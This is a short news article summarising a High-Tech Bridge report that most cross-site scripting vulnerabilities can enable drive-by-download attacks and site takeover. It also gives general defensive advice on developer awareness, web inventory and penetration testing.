XSS vulnerabilities open the door to drive-by downloads
Cross-site scripting (XSS) vulnerabilities allow attackers to inject script into web pages in order to infect client computers.
Security company High-Tech Bridge has released a report revealing that 95 percent of XSS vulnerabilities can be used to perform sophisticated drive-by-download attacks, which infect users who open harmless-looking URLs that they trust. More worrying is that 90 percent of vulnerabilities can be exploited in such a way that even advanced users and IT professionals won't suspect anything. The structure and architecture of more than 70 percent of web applications allows the creation of a sophisticated XSS exploit that can perform several fully-automated actions, ultimately giving full administrative access to the attacker. This access can then be used by hackers to compromise the entire website and even the web server.
To protect against this type of attack companies are advised to explain to their web developers that one XSS vulnerability may lead to total compromise of the entire company. Developers and server admins need to respect security best practices as this will resolve majority of potential problems.
It's also important to make sure that the IT team has a clear inventory of web resources and that there are no abandoned or test web projects that are accessible from the outside. Regular web penetration testing by an independent company is recommended too.
Ilia Kolochenko, High-Tech Bridge's CEO, says, "SQL injection vulnerabilities are becoming more and more rare, as well as other high and critical risk vulnerabilities. They are complex to detect and quite often requires a lot of time to exploit. At the same time almost nobody cares about 'medium-risk' XSS vulnerabilities leaving their websites vulnerable. Obviously, hackers benefit from such negligence and use XSS vulnerabilities to achieve their goals. If you close your door, don't forget to close your windows -- otherwise the entire security is at risk".
There’s much more information on how XSS can leave users open to hacking on the High-Tech Bridge blog.